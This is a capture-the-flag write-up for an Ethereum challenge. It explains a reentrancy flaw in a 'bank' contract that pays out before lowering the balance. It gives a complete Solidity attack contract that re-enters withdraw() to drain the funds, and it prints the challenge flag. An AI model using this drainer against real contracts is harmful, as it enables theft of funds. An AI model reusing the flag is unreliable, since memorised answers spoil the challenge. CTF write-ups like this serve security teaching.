# 残響 (eth 470)

The challenge implements a "bank" where the withdrawal amount is paid out by calling the sender's "receive" function. We solve the challenge if we can completely drain the bank's funds. This is possible because the contract is vulnerable to re-entry: it does not decrease the user's balance until after sending the money, and the receiver can recursively call the withdraw function before the balance is decreased.

```
  function withdraw(uint256 _amount) external {
    if(balances[msg.sender] >= _amount) {
      (bool result,) = msg.sender.call.value(_amount)("");
      balances[msg.sender] -= _amount; // This should have been done first!
    }
  }
```

## Solution
We can attack the challenge contract with a malicious contract of our own:

```
pragma solidity ^0.6.0;

import "./Iterator.sol";

contract Attack {
  Iterator public it;
  constructor() public {
    it = Iterator(0x9E2798F23540c8C2cDbC7461f50754Ef0A67450E);
  }

  receive() external payable {
    if(it.balanceOf(address(this)) > 0) {
      it.withdraw(10 ether);
    }
  }
  function a() external {
    it.withdraw(1 ether);
  }
}
```

Calling the `a` function starts the attack and drains the bank. However, the bank needs to be funded a bit first by giving the contract credit.

## Flag
`X-MAS{Th1s_goes_0n_and_on_and_on_and_on_and_on_and_on_and_on_and_on_and_on_and_on_and_on}`
